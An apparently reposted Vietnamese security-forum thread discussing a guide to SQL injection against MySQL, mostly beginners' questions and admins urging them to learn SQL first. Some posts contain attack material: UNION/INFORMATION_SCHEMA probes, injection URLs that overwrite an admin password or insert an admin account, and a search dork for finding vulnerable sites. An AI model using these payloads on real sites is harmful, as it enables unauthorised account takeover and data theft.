constructor_87 wrote:
@lyhuuloi: mới đọc mấy bài của bác bên phần lập trình web ^^! ma em có commen bên blog của bác rồi. mong bác sớm hồi âm smilie

Hi, mình đã trả lời lại trên Blog, thanks bạn đã comment, and hope you like it smilie

Hello HVA smilie
http://lyhuuloi.com smilie
[Up] [Print Copy]


[Bài viết] Hướng dẫn khai thác SQL Injection đối với MySQL 18/07/2009 08:11:51 (+0700) | #38 | 186651
tinios
Member
[Minus] 0 [Plus]
Joined: 27/02/2009 18:00:44
Bài gởi: 22
Offline
[Profile] [PM]
mọi người cho em hỏi trong blind SQL thì làm sao phân biệt được MSSQL và MYSQL vì thường lỗi không xuất ra màn hình
[Up] [Print Copy]


[Bài viết] Hướng dẫn khai thác SQL Injection đối với MySQL 22/07/2009 12:53:05 (+0700) | #39 | 187118
constructor_87
Member
[Minus] 0 [Plus]
Joined: 30/06/2007 00:53:47
Bài gởi: 23
Offline
[Profile] [PM]
nhìn vào lỗi truy vấn làm sao biết dc web sử dụng loại database nào? đối với mỗi loại database thì lệnh truy vấn sẽ khác nhau phải ko nhỉ? ví dụ như mySQL và SQLserver code truy vấn trên url sẽ khác nhau?
lỗi xuất hiện khi thêm ' sau id :

SQL query : SELECT * FROM hn_aboutuS WHERE AU_ID=8\'

SQL Error : (1064) You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1

File : AboutUs.php
Line : 100
vậy web đã vá lỗi hay chưa?
xin chỉ giáo. cám ơn!
[Up] [Print Copy]


[Bài viết] Hướng dẫn khai thác SQL Injection đối với MySQL 22/07/2009 17:44:39 (+0700) | #40 | 187123
[Avatar]
conmale
Administrator
Joined: 07/05/2004 23:43:15
Bài gởi: 9353
Đến từ: down under
Offline
[Profile] [PM]
constructor_87 wrote:
nhìn vào lỗi truy vấn làm sao biết dc web sử dụng loại database nào? đối với mỗi loại database thì lệnh truy vấn sẽ khác nhau phải ko nhỉ? ví dụ như mySQL và SQLserver code truy vấn trên url sẽ khác nhau?
lỗi xuất hiện khi thêm ' sau id :

SQL query : SELECT * FROM hn_aboutuS WHERE AU_ID=8\'

SQL Error : (1064) You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1

File : AboutUs.php
Line : 100
vậy web đã vá lỗi hay chưa?
xin chỉ giáo. cám ơn!


---> quá rõ.

Lỗi gì mà vá? Nếu lỗi do mình tạo câu truy vấn sai cú pháp thì... vá cái gì?
What bringing us together is stronger than what pulling us apart.
[Up] [Print Copy]


[Bài viết] Hướng dẫn khai thác SQL Injection đối với MySQL 22/07/2009 22:13:20 (+0700) | #41 | 187148
[Avatar]
c0ngit
Member
[Minus] 0 [Plus]
Joined: 21/07/2009 19:26:10
Bài gởi: 11
Đến từ: C:/
Offline
[Profile] [PM] [WWW] [Yahoo!] [MSN] [ICQ]
msa sao khi muốn test lại lỗi vậy, có phải mạng của mình có vấn đề hay là do site nhỉ smilie
• I-SHIFT.VN •
Be Yourself
[Up] [Print Copy]


[Bài viết] Hướng dẫn khai thác SQL Injection đối với MySQL 22/07/2009 22:24:43 (+0700) | #42 | 187151
[Avatar]
conmale
Administrator
Joined: 07/05/2004 23:43:15
Bài gởi: 9353
Đến từ: down under
Offline
[Profile] [PM]
c0ngit wrote:
msa sao khi muốn test lại lỗi vậy, có phải mạng của mình có vấn đề hay là do site nhỉ smilie


Tại sao hỏi một câu không có đầu đũa và vô nghĩa như vậy?
What bringing us together is stronger than what pulling us apart.
[Up] [Print Copy]


[Bài viết] Hướng dẫn khai thác SQL Injection đối với MySQL 23/07/2009 00:02:24 (+0700) | #43 | 187175
Monkey.D.Luffy
Member
[Minus] 0 [Plus]
Joined: 22/07/2009 10:18:18
Bài gởi: 9
Đến từ: @
Offline
[Profile] [PM]
tinios wrote:
mọi người cho em hỏi trong blind SQL thì làm sao phân biệt được MSSQL và MYSQL vì thường lỗi không xuất ra màn hình


Cái này thì theo kinh nghiệm của mình thì đa phần thằng nào xài PHP là dùng MySQL còn ASP, ASP.NET thì MSSQL, còn không thì bác có thể đoán qua function version() (MYSQL) hay @@version (MSSQL).
[Up] [Print Copy]


[Bài viết] Hướng dẫn khai thác SQL Injection đối với MySQL 23/07/2009 05:43:54 (+0700) | #44 | 187205
constructor_87
Member
[Minus] 0 [Plus]
Joined: 30/06/2007 00:53:47
Bài gởi: 23
Offline
[Profile] [PM]
constructor_87 wrote:
nhìn vào lỗi truy vấn làm sao biết dc web sử dụng loại database nào? đối với mỗi loại database thì lệnh truy vấn sẽ khác nhau phải ko nhỉ? ví dụ như mySQL và SQLserver code truy vấn trên url sẽ khác nhau?
-----------------------------------------------------------------------------------------------------------------------------------
lỗi xuất hiện khi thêm ' sau id :

SQL query : SELECT * FROM hn_aboutuS WHERE AU_ID=8\'

SQL Error : (1064) You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1

File : AboutUs.php
Line : 100
vậy web đã vá lỗi hay chưa?
xin chỉ giáo. cám ơn!


bác conmale ơi! câu hỏi của em chia thành 2 câu riêng biệt, phần trên và dưới gạch ngang ko a/h gì đến nhau ạ!
mà trong câu hỏi dưới thì lỗi xuất hiện khi em thêm ' sau id trên url (tại sao lại là truy vấn sai?) cám ơn bác nhiều!
[Up] [Print Copy]


[Bài viết] Hướng dẫn khai thác SQL Injection đối với MySQL 23/07/2009 05:48:15 (+0700) | #45 | 187206
[Avatar]
conmale
Administrator
Joined: 07/05/2004 23:43:15
Bài gởi: 9353
Đến từ: down under
Offline
[Profile] [PM]
constructor_87 wrote:
constructor_87 wrote:
nhìn vào lỗi truy vấn làm sao biết dc web sử dụng loại database nào? đối với mỗi loại database thì lệnh truy vấn sẽ khác nhau phải ko nhỉ? ví dụ như mySQL và SQLserver code truy vấn trên url sẽ khác nhau?
-----------------------------------------------------------------------------------------------------------------------------------
lỗi xuất hiện khi thêm ' sau id :

SQL query : SELECT * FROM hn_aboutuS WHERE AU_ID=8\'

SQL Error : (1064) You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1

File : AboutUs.php
Line : 100
vậy web đã vá lỗi hay chưa?
xin chỉ giáo. cám ơn!


bác conmale ơi! câu hỏi của em chia thành 2 câu riêng biệt, phần trên và dưới gạch ngang ko a/h gì đến nhau ạ!
mà trong câu hỏi dưới thì lỗi xuất hiện khi em thêm ' sau id trên url (tại sao lại là truy vấn sai?) cám ơn bác nhiều!


2 câu riêng biệt nhưng phần 2 trả lời cho phần 1.

Tại sao truy vấn sai? Đọc trang http://dev.mysql.com/doc/.
What bringing us together is stronger than what pulling us apart.
[Up] [Print Copy]


[Bài viết] Hướng dẫn khai thác SQL Injection đối với MySQL 23/07/2009 11:45:48 (+0700) | #46 | 187242
constructor_87
Member
[Minus] 0 [Plus]
Joined: 30/06/2007 00:53:47
Bài gởi: 23
Offline
[Profile] [PM]
thế bác cho em bỏ câu thứ 2 đi! em chỉ muốn tìm hiểu thế này "nhìn vào lỗi truy vấn làm sao biết dc web sử dụng loại database nào? đối với mỗi loại database thì lệnh truy vấn sẽ khác nhau phải ko nhỉ? ví dụ như mySQL và SQLserver code truy vấn trên url sẽ khác nhau?" trăm sự nhờ bác ^^! mà link bác cho die ròi >"<
[Up] [Print Copy]


[Bài viết] Hướng dẫn khai thác SQL Injection đối với MySQL 23/07/2009 18:29:19 (+0700) | #47 | 187265
[Avatar]
conmale
Administrator
Joined: 07/05/2004 23:43:15
Bài gởi: 9353
Đến từ: down under
Offline
[Profile] [PM]
constructor_87 wrote:
thế bác cho em bỏ câu thứ 2 đi! em chỉ muốn tìm hiểu thế này "nhìn vào lỗi truy vấn làm sao biết dc web sử dụng loại database nào? đối với mỗi loại database thì lệnh truy vấn sẽ khác nhau phải ko nhỉ? ví dụ như mySQL và SQLserver code truy vấn trên url sẽ khác nhau?" trăm sự nhờ bác ^^! mà link bác cho die ròi >"<



Học để biết SQL là gì rồi hẵng nói đến chuyện SQL Injection.
What bringing us together is stronger than what pulling us apart.
[Up] [Print Copy]


[Bài viết] Hướng dẫn khai thác SQL Injection đối với MySQL 24/07/2009 00:54:42 (+0700) | #48 | 187309
constructor_87
Member
[Minus] 0 [Plus]
Joined: 30/06/2007 00:53:47
Bài gởi: 23
Offline
[Profile] [PM]
thôi thì bác chiếu cố bật mí cho em tí. chứ em cũng đang mày mò SQL đâu phải hỏi chơi đâu ạ , huu
[Up] [Print Copy]


[Bài viết] Hướng dẫn khai thác SQL Injection đối với MySQL 24/07/2009 03:11:30 (+0700) | #49 | 187335
lyhuuloi
Elite Member
[Minus] 0 [Plus]
Joined: 04/04/2003 11:29:17
Bài gởi: 90
Đến từ: TP HCM
Offline
[Profile] [PM] [Email] [WWW] [Yahoo!]
constructor_87 wrote:
thôi thì bác chiếu cố bật mí cho em tí. chứ em cũng đang mày mò SQL đâu phải hỏi chơi đâu ạ , huu

Bác conmale nói đúng mà smilie Nếu đúng là đang mò SQL thật, thì chắc hẳn nhìn câu 2 đã trả lời cho câu 1 rồi, học đi trước khi học chạy nhé bạn smilie

PS: Em thích câu trả lời của bác conmale lắm smilie
http://lyhuuloi.com smilie
[Up] [Print Copy]


[Bài viết] Hướng dẫn khai thác SQL Injection đối với MySQL 25/07/2009 04:22:04 (+0700) | #50 | 187452
constructor_87
Member
[Minus] 0 [Plus]
Joined: 30/06/2007 00:53:47
Bài gởi: 23
Offline
[Profile] [PM]
lyhuuloi wrote:
constructor_87 wrote:
thôi thì bác chiếu cố bật mí cho em tí. chứ em cũng đang mày mò SQL đâu phải hỏi chơi đâu ạ , huu

Bác conmale nói đúng mà smilie Nếu đúng là đang mò SQL thật, thì chắc hẳn nhìn câu 2 đã trả lời cho câu 1 rồi, học đi trước khi học chạy nhé bạn smilie

PS: Em thích câu trả lời của bác conmale lắm smilie

hỏi là cách học tập nhanh nhất mà.... em đang học chứ có chơi đâu bác lyhuuloi smilie
[Up] [Print Copy]


[Thảo luận] Hướng dẫn khai thác SQL Injection đối với MySQL 25/07/2009 05:00:55 (+0700) | #51 | 187461
seamoun
Advisor
Joined: 04/01/2002 14:05:10
Bài gởi: 357
Offline
[Profile] [PM]
constructor_87 wrote:
lyhuuloi wrote:
constructor_87 wrote:
thôi thì bác chiếu cố bật mí cho em tí. chứ em cũng đang mày mò SQL đâu phải hỏi chơi đâu ạ , huu

Bác conmale nói đúng mà smilie Nếu đúng là đang mò SQL thật, thì chắc hẳn nhìn câu 2 đã trả lời cho câu 1 rồi, học đi trước khi học chạy nhé bạn smilie

PS: Em thích câu trả lời của bác conmale lắm smilie

hỏi là cách học tập nhanh nhất mà.... em đang học chứ có chơi đâu bác lyhuuloi smilie

Theo seamoun thì bạn nên học từ cái căn bản nhất, rồi hãy tính đến chuyện security, hack hiếc này nọ, chứ đừng đụng cái gì cũng hỏi, phải học và làm đi, khi đó nếu có trở ngại thì mới hỏi. Đề nghị không hỏi vu vơ trong chủ đề này nữa ! smilie smilie
--vickigroup.com--
[Up] [Print Copy]


[Bài viết] Hướng dẫn khai thác SQL Injection đối với MySQL 25/07/2009 05:15:51 (+0700) | #52 | 187462
MrKenichi
Member
[Minus] 0 [Plus]
Joined: 10/11/2007 14:12:49
Bài gởi: 7
Offline
[Profile] [PM]
constructor_87 nên so sánh coi khi CSDL là mysql thì nó hiện thông báo lỗi là thế nào , mssql hoặc jet thì thế nào nhưng trước hết muốn sql injection thì phải học căn bản đã SQL là gì ?.
Seamoun có cách tip nào hay thủ thuật có thể blind mysql để đoán thông tin table ... nhanh chóng hơn không smilie . Cảm ơn nhiều
[Up] [Print Copy]


[Bài viết] Hướng dẫn khai thác SQL Injection đối với MySQL 25/07/2009 05:59:43 (+0700) | #53 | 187468
constructor_87
Member
[Minus] 0 [Plus]
Joined: 30/06/2007 00:53:47
Bài gởi: 23
Offline
[Profile] [PM]
@seamoun: vừa học nhưng cũng vừa ....(hehe...) cho nó đỡ nhạt bác à hii
@MrKenichi: chưa biết lỗi của từng loại database như thế nào thì sao mà so sánh hả bác smilie
tiện cho em test kiến thức về SQL chút smilie
Code:
SQL query : SELECT * FROM hn_train WHERE N_ID=26 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES–

SQL Error : (1064) You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES–' at line 1

File : Trainning.php
Line : 100


=> datbase là SQL server, lỗi là do truy vấn
UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES–
sai trường và table.
em kết luận vấy chuẩn chưa ạ?
[Up] [Print Copy]


[Bài viết] Hướng dẫn khai thác SQL Injection đối với MySQL 25/07/2009 07:51:57 (+0700) | #54 | 187477
seamoun
Advisor
Joined: 04/01/2002 14:05:10
Bài gởi: 357
Offline
[Profile] [PM]
constructor_87 wrote:
@seamoun: vừa học nhưng cũng vừa ....(hehe...) cho nó đỡ nhạt bác à hii
@MrKenichi: chưa biết lỗi của từng loại database như thế nào thì sao mà so sánh hả bác smilie
tiện cho em test kiến thức về SQL chút smilie
Code:
SQL query : SELECT * FROM hn_train WHERE N_ID=26 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES–

SQL Error : (1064) You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES–' at line 1

File : Trainning.php
Line : 100


=> datbase là SQL server, lỗi là do truy vấn
UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES–
sai trường và table.
em kết luận vấy chuẩn chưa ạ?


Tôi đã nói là bạn hãy học kỹ SQL đối với từng loại database rồi hãy hỏi.
--vickigroup.com--
[Up] [Print Copy]


[Bài viết] Hướng dẫn khai thác SQL Injection đối với MySQL 25/07/2009 10:25:09 (+0700) | #55 | 187494
constructor_87
Member
[Minus] 0 [Plus]
Joined: 30/06/2007 00:53:47
Bài gởi: 23
Offline
[Profile] [PM]
thực sự em mò mẫm SQL và em đã hiểu các lệnh truy vấn của nó nhưng SQL đối với từng loại database thì em ko tìm đâu ra tài liệu. mong mấy bác tư vấn dùm các thắc mắc của em nha'... hu...
[Up] [Print Copy]


[Bài viết] Hướng dẫn khai thác SQL Injection đối với MySQL 25/07/2009 13:55:54 (+0700) | #56 | 187514
joaqujn
Member
[Minus] 0 [Plus]
Joined: 25/07/2009 01:22:56
Bài gởi: 1
Offline
[Profile] [PM]
Cho mình hỏi với MySQL v3 liệu có cách nào khai thác ko?
[Up] [Print Copy]


[Bài viết] Hướng dẫn khai thác SQL Injection đối với MySQL 29/07/2009 01:32:09 (+0700) | #57 | 187873
phamlenhan555
Member
[Minus] 0 [Plus]
Joined: 20/07/2009 11:25:30
Bài gởi: 14
Offline
[Profile] [PM]
mún làm thử thì dow cái testermysql của ông ML về chạy thử tui cũng đang học cái này đây
[Up] [Print Copy]


[Bài viết] Hướng dẫn khai thác SQL Injection đối với MySQL 29/07/2009 12:01:54 (+0700) | #58 | 187951
constructor_87
Member
[Minus] 0 [Plus]
Joined: 30/06/2007 00:53:47
Bài gởi: 23
Offline
[Profile] [PM]
conmale wrote:
constructor_87 wrote:
thì mình không hề nhờ giải mã mà smilie ý mình ở đây là mình làm theo hướng dẫn nhưng không ra password bình thường mà lại ra password đã bị mã hóa. và mình không hiểu lý do tại sao lại vậy. không lẽ kết quả đạt được lại mang tính hên xui .... (xui thì ra pw đã bị mã hóa như mình)


Nếu mật khẩu được "mã hóa" và lưu trong CSDL ở dạng "mã hóa" thì bồ "lấy" nó ra, nó cũng ở dạng "mã hóa" chớ có gì đâu mà khó hiểu?

99.99999% các ứng dụng thời buổi này không lưu mật khẩu ở dạng cleartext mà thường được "mã hóa". Đây là chuyện thông thường mà thôi. Chẳng có gì hên xui cả.


hầu như password thu đc thời buổi này đều đc "mã hóa" như bác nói. có lẽ sql injection "lỗi thời" thật rồi bác à!

mà các câu truy vấn tùy thuộc theo code của web chứ loại database đâu có a/h gì đến truy vấn của sql ịnection đâu bác nhỉ?
[Up] [Print Copy]


[Bài viết] Hướng dẫn khai thác SQL Injection đối với MySQL 29/07/2009 15:37:27 (+0700) | #59 | 187963
StarGhost
Elite Member
[Minus] 0 [Plus]
Joined: 29/03/2005 20:34:22
Bài gởi: 662
Đến từ: The Queen
Offline
[Profile] [PM]
@constructor_87: thế còn những queries như DROP, INSERT, UPDATE thì có lỗi thời không bạn? Sao lại thấy cái gì cứ mã hóa là chịu thua vậy?
Mind your thought.
[Up] [Print Copy]


[Bài viết] Hướng dẫn khai thác SQL Injection đối với MySQL 29/07/2009 23:40:24 (+0700) | #60 | 187975
sovietw0rm
Member
[Minus] 0 [Plus]
Joined: 14/02/2008 18:05:38
Bài gởi: 7
Offline
[Profile] [PM]
constructor_87 wrote:
conmale wrote:
constructor_87 wrote:
thì mình không hề nhờ giải mã mà smilie ý mình ở đây là mình làm theo hướng dẫn nhưng không ra password bình thường mà lại ra password đã bị mã hóa. và mình không hiểu lý do tại sao lại vậy. không lẽ kết quả đạt được lại mang tính hên xui .... (xui thì ra pw đã bị mã hóa như mình)


Nếu mật khẩu được "mã hóa" và lưu trong CSDL ở dạng "mã hóa" thì bồ "lấy" nó ra, nó cũng ở dạng "mã hóa" chớ có gì đâu mà khó hiểu?

99.99999% các ứng dụng thời buổi này không lưu mật khẩu ở dạng cleartext mà thường được "mã hóa". Đây là chuyện thông thường mà thôi. Chẳng có gì hên xui cả.


hầu như password thu đc thời buổi này đều đc "mã hóa" như bác nói. có lẽ sql injection "lỗi thời" thật rồi bác à!

mà các câu truy vấn tùy thuộc theo code của web chứ loại database đâu có a/h gì đến truy vấn của sql ịnection đâu bác nhỉ?



sai lầm lớn nhất là câu này "mà các câu truy vấn tùy thuộc theo code của web chứ loại database đâu có a/h gì đến truy vấn của sql ịnection đâu bác nhỉ?"

Admin
Admin

Tổng số bài gửi : 69
Join date : 13/09/2018

Xem lý lịch thành viên http://hvaonline.forumvi.com

Về Đầu Trang Go down

Re: [Bài viết] Hướng dẫn khai thác SQL Injection đối với MySQL

Bài gửi by Admin on Thu Sep 13, 2018 11:26 am


sovietw0rm
Member
[Minus] 0 [Plus]
Joined: 14/02/2008 18:05:38
Bài gởi: 7
Offline
[Profile] [PM]
joaqujn wrote:
Cho mình hỏi với MySQL v3 liệu có cách nào khai thác ko?


mysql v3 có cách khai thác, với mysql v3 không dùng union được vì nó không có vì vậy kỹ thuật inband sqli có lẽ là không dùng được, nhưng blind thì được ...
[Up] [Print Copy]


[Bài viết] Hướng dẫn khai thác SQL Injection đối với MySQL 31/07/2009 12:51:16 (+0700) | #62 | 188186
constructor_87
Member
[Minus] 0 [Plus]
Joined: 30/06/2007 00:53:47
Bài gởi: 23
Offline
[Profile] [PM]
@StarGhost: em chỉ muốn thâm nhập chứ ko dám hack mà bác. làm như bác hư hết "hàng hóa" smilie
@sovietw0rm: why ?
[Up] [Print Copy]


[Bài viết] Hướng dẫn khai thác SQL Injection đối với MySQL 31/07/2009 13:38:05 (+0700) | #63 | 188191
pdah
Member
[Minus] 0 [Plus]
Joined: 26/06/2006 20:44:03
Bài gởi: 47
Offline
[Profile] [PM]
Tôi để ý từ lần đầu tiên bạn constructor_87 post bài ở topic này đến bây giờ là tròn 2 tuần rồi, anh em đã nhắc bạn phải học SQL cho thật đàng hoàng rồi hãy tiếp tục nói chuyện rồi cơ mà.
Thời gian 2 tuần là quá đủ để bạn biết những thứ sơ đẳng về SQL và những thứ xung quanh nó (nếu bạn thực sự nghiêm túc) và tránh hàng tá câu phát ngôn + hỏi bừa bãi như trên.
Sorry bạn nếu bài viết này hơi nặng lời.
Tui tư duy nên tui tồn tại
[Up] [Print Copy]


[Bài viết] Hướng dẫn khai thác SQL Injection đối với MySQL 01/08/2009 00:07:44 (+0700) | #64 | 188217
constructor_87
Member
[Minus] 0 [Plus]
Joined: 30/06/2007 00:53:47
Bài gởi: 23
Offline
[Profile] [PM]
thứ nhất: đã học SQL thì cũng hiểu phần nào chứ sao có thể hiểu hết đc sql injection
thứ hai: dựa vào kiến thức tự mình tìm hiểu đc mình thấy các bác phản bác câu hỏi của mình vô lý mình phải hỏi ngược lại cho ra nhẽ (bổ sung luôn lỗ hỗng của mình)
chứ có gì lại bảo về ôm sách mà đọc thì ....
[Up] [Print Copy]


[Bài viết] Hướng dẫn khai thác SQL Injection đối với MySQL 01/08/2009 00:39:47 (+0700) | #65 | 188224
[Avatar]
conmale
Administrator
Joined: 07/05/2004 23:43:15
Bài gởi: 9353
Đến từ: down under
Offline
[Profile] [PM]
constructor_87 wrote:
thứ nhất: đã học SQL thì cũng hiểu phần nào chứ sao có thể hiểu hết đc sql injection
thứ hai: dựa vào kiến thức tự mình tìm hiểu đc mình thấy các bác phản bác câu hỏi của mình vô lý mình phải hỏi ngược lại cho ra nhẽ (bổ sung luôn lỗ hỗng của mình)
chứ có gì lại bảo về ôm sách mà đọc thì ....


---> sao cứ nhập nhằng chuyện kiến thức sql và chuyện sql injection mãi thế? Muốn hiểu được sql injection thì trước tiên phải thấu đáo sql statement (cụ thể cho từng loại database). Ngay cả một câu sql đơn giản bị báo lỗi mà còn không biết lý do tại sao thì làm sao mà "inject"?

Khi nào nắm vững sql statements, khi ấy tự nhiên sẽ ngộ ra sql injection là cái gì thôi. Chưa đi được thì đừng cố chạy.
What bringing us together is stronger than what pulling us apart.
[Up] [Print Copy]


[Bài viết] Hướng dẫn khai thác SQL Injection đối với MySQL 01/08/2009 00:52:51 (+0700) | #66 | 188225
[Avatar]
quanta
Moderator
Joined: 28/07/2006 14:44:21
Bài gởi: 7265
Đến từ: $ locate `whoami`
Offline
[Profile] [PM]
Khổ quá, ở HVA (cụ thể là anh conmale) chỉ muốn truyền đạt cho mọi người mấy cái chân lý "vô cùng đơn giản" thế này thôi:

- Dùng cái gì thì đọc tài liệu về cái đó
- Muốn 'hack' cái gì thì phải hiểu thật rõ cái đó
- Luôn luôn phải xây cái "móng" trước và xây cho thật vững, đừng cố đốt cháy giai đoạn
- Luôn luôn thể hiện mình đã mày mò, tìm tòi trước khi hỏi
...

Bạn nào "ngộ" ra được mấy cái chân lý này thì sẽ nhanh tiến bộ (và có khi lại từ bỏ ý định hack hiếc này nọ, quay về cày quốc kiếm $ nuôi vợ con) còn bạn nào không hiểu hoặc cố tình không hiểu thì đành chịu vậy.

PS: Còn thiếu cái "chân lý" nào ai bổ sung giúp mình với.
Let's build on a great foundation!
[Up] [Print Copy]


[Bài viết] Hướng dẫn khai thác SQL Injection đối với MySQL 01/08/2009 06:37:08 (+0700) | #67 | 188249
[Avatar]
tranhuuphuoc
Moderator
Joined: 05/09/2004 06:08:09
Bài gởi: 865
Đến từ: Lầu Xanh
Offline
[Profile] [PM] [WWW]
Còn, em . smilie

Có công mài cây sắt có ngày thành cây .... xà beng smilie
Không ai chỉ, cho hay bán cho bạn "bí kiếp" để thành công ngoài việc bạn thành công bằng chính sự nổ lực, nghiên cứu tìm tòi của chính bản thân của bạn .

Mạo muội vài dòng 8
[Up] [Print Copy]


[Bài viết] Hướng dẫn khai thác SQL Injection đối với MySQL 22/08/2009 17:01:45 (+0700) | #68 | 190820
[Avatar]
yeucodon
Member
[Minus] 0 [Plus]
Joined: 22/03/2008 11:25:51
Bài gởi: 39
Offline
[Profile] [PM]
em nghĩ bác admin nên mở riêng 1 topic cho ae bên này chứ em thấy hướng dẫn mà đọc mỏi mắt toàn thấy các bác ấy "đi lạc chủ đề" thôi ạ
sống trong đời sống, cần có một tấm lòng
[Up] [Print Copy]


[Bài viết] Hướng dẫn khai thác SQL Injection đối với MySQL 03/01/2010 11:43:26 (+0700) | #69 | 202418
momiado_9x
Member
[Minus] 0 [Plus]
Joined: 28/12/2009 21:03:35
Bài gởi: 5
Offline
[Profile] [PM]
Mấy bác cho em hỏi tí, đối với các shop mà khi bắt lỗi như trên thì nó báo thế này : No products match your search. thì phải dùng cách nào hả mấy bác ???
P/S :sao em không đánh được tiếng việt trong forum ta nhỉ?
[Up] [Print Copy]


[Bài viết] Hướng dẫn khai thác SQL Injection đối với MySQL 19/01/2010 16:19:48 (+0700) | #70 | 203579
caotrienx
Member
[Minus] 0 [Plus]
Joined: 24/02/2007 16:21:27
Bài gởi: 9
Offline
[Profile] [PM]
Mình hack được user/pass: admin:57c4b03b07d5b098b92a0205dcca66d5 chuỗi md5 này ko giải mã được

Theo 1 bài viết có cách hướng dẫn đổi pass hoặc record 1 newuser/newpass(newpass được đã được giải mã) khi biết được các table va column
Để thay đổi password , có thể làm như sau:
http://yoursite.com/index.php?id=10 UPDATE 'admin_login' SET 'password'= 'newpass' WHERE login_name='admin'--

Hoặc nếu bạn muốn một record mới(tạo một newuser/newpass) vào table:
http://yoursite.com/index.php?id=10 INSERT INTO 'admin_login'('login_id', 'login_name', 'password') VALUES(`1`,'admin1','newpass')--

mình thử nhưng ko được kể cả khi chuyển login_name sang hex newuser=admin1=61646d696e31

INSERT INTO 'admin_login' ('login_id', 'login_name', 'password') VALUES
(`1`, `0x61646d696e31`, `bf15876b12c0a194dcb842c3ec9cb078`)--

Ai cho mình biết sai ở đâu ko!
[Up] [Print Copy]


[Bài viết] Hướng dẫn khai thác SQL Injection đối với MySQL 12/03/2010 16:58:12 (+0700) | #71 | 206728
hacker_lo_mo
Member
[Minus] 0 [Plus]
Joined: 11/03/2010 21:20:50
Bài gởi: 2
Offline
[Profile] [PM]
Các bạn cho mình hỏi. Sau khi lấy biết được các bảng nhạy cảm như admin, (tbl_admin), nhưng password đã bị băm. Vậy đến đây thì ngoài việc đi giải băm MD5 (mà gần như mình chưa thấy trang nào hỗ trợ tìm clear-text từ MD5), thì có kỹ thuật nào để tiếp tục tấn công khôg các bác ?
[Up] [Print Copy]


[Bài viết] Hướng dẫn khai thác SQL Injection đối với MySQL 29/09/2010 10:30:44 (+0700) | #72 | 221756
[Avatar]
heocaca
Member
[Minus] 0 [Plus]
Joined: 17/09/2010 11:15:05
Bài gởi: 6
Đến từ: dak lak
Offline
[Profile] [PM] [WWW] [Yahoo!] [ICQ]
nbthanh wrote:
Bài viết rất hay và xúc tích! Đây là 1 ví dụ kinh điển nhất cho
- "muốn hack thì phải GIỎI những thứ CĂN BẢN / NỀN TẢNG trước như lập trình, SQL, v.v..."
- và "khi đã GIỎI những thứ CĂN BẢN / NỀN TẢNG rồi thì tự nhiên sẽ biết hack"

Chẳng hạn như không biết lập trình, không biết SQL, không biết những thứ nền tảng này thì có biết site bị lỗi cũng không biết đường nào mà khai thác.

Bạn ơi, người VN hay giấu nghề lắm, các pro giờ muốn bỏ rơi các noobie, nên nói vậy đó, một noopbi luôn có câu hỏi làm sao biết 1 web site lỗi SQL, mình sẽ cho bạn 1 thủ thuật có thế quét lỗi bất kì một trang web nào thông qua công cụ SQL Inject Me , có lẽ sẽ thoả mãn câu hỏi của bạn. smilie (click vô link dưới đây)


Cách quét lỗi SQL với mọi Website => http://my.opera.com/heocacavltk1/blog/show.dml/18190232 smilie [i]
[Up] [Print Copy]


[Bài viết] Hướng dẫn khai thác SQL Injection đối với MySQL 20/10/2010 07:14:12 (+0700) | #73 | 223184
jizuba
Member
[Minus] 0 [Plus]
Joined: 05/11/2009 01:08:02
Bài gởi: 1
Offline
[Profile] [PM]
các bác làm ơn cho em mạo muội hỏi 1 câu này nhá:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC Microsoft Access Driver] Data type mismatch in criteria expression.
như bên trên là sao vậy smilie .em chưa biết gì
[Up] [Print Copy]


[Bài viết] Hướng dẫn khai thác SQL Injection đối với MySQL 20/10/2010 07:41:14 (+0700) | #74 | 223187
[Avatar]
conmale
Administrator
Joined: 07/05/2004 23:43:15
Bài gởi: 9353
Đến từ: down under
Offline
[Profile] [PM]
jizuba wrote:
các bác làm ơn cho em mạo muội hỏi 1 câu này nhá:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC Microsoft Access Driver] Data type mismatch in criteria expression.
như bên trên là sao vậy smilie .em chưa biết gì


Là qua bên mục "Windows" và mở một chủ đề mới về "vỡ lòng MS SQL".
What bringing us together is stronger than what pulling us apart.
[Up] [Print Copy]


[Hỏi đáp] Hướng dẫn khai thác SQL Injection đối với MySQL 04/11/2010 13:29:55 (+0700) | #75 | 224211
khucyeuthuong2
Member
[Minus] 0 [Plus]
Joined: 05/09/2010 05:00:48
Bài gởi: 1
Offline
[Profile] [PM]
cho em hỏi "Đầu tiên với URL: http://seamoun.com/phpevents/event.php?id=1", ta có thể tìm được link này với bất kỳ trang web nào không?và bằng cách nào vậy?anh em giúp cho.em mới học nên còn kém lắm.thanks
[Up] [Print Copy]


[Bài viết] Hướng dẫn khai thác SQL Injection đối với MySQL 04/11/2010 21:27:17 (+0700) | #76 | 224251
[Avatar]
Mr.uot
Member
[Minus] 0 [Plus]
Joined: 16/08/2010 12:56:29
Bài gởi: 2
Đến từ: x-cafe
Offline
[Profile] [PM] [WWW] [Yahoo!]
khucyeuthuong2 wrote:
cho em hỏi "Đầu tiên với URL: http://seamoun.com/phpevents/event.php?id=1", ta có thể tìm được link này với bất kỳ trang web nào không?và bằng cách nào vậy?anh em giúp cho.em mới học nên còn kém lắm.thanks


cái này muốn tìm thì vào google search
inurl: products.php?id=

rồi check từng site bạn à:">
[size=+1]Hạnh Phúc Nhất Cuộc Đời Mình Là Được Cầm Tay smilie Người Ấy Dù Chỉ Một Lần smilie [/size]
[Up] [Print Copy]


[Bài viết] Hướng dẫn khai thác SQL Injection đối với MySQL 17/03/2011 14:15:41 (+0700) | #77 | 233338
wkiamiuemth
Member
[Minus] 0 [Plus]
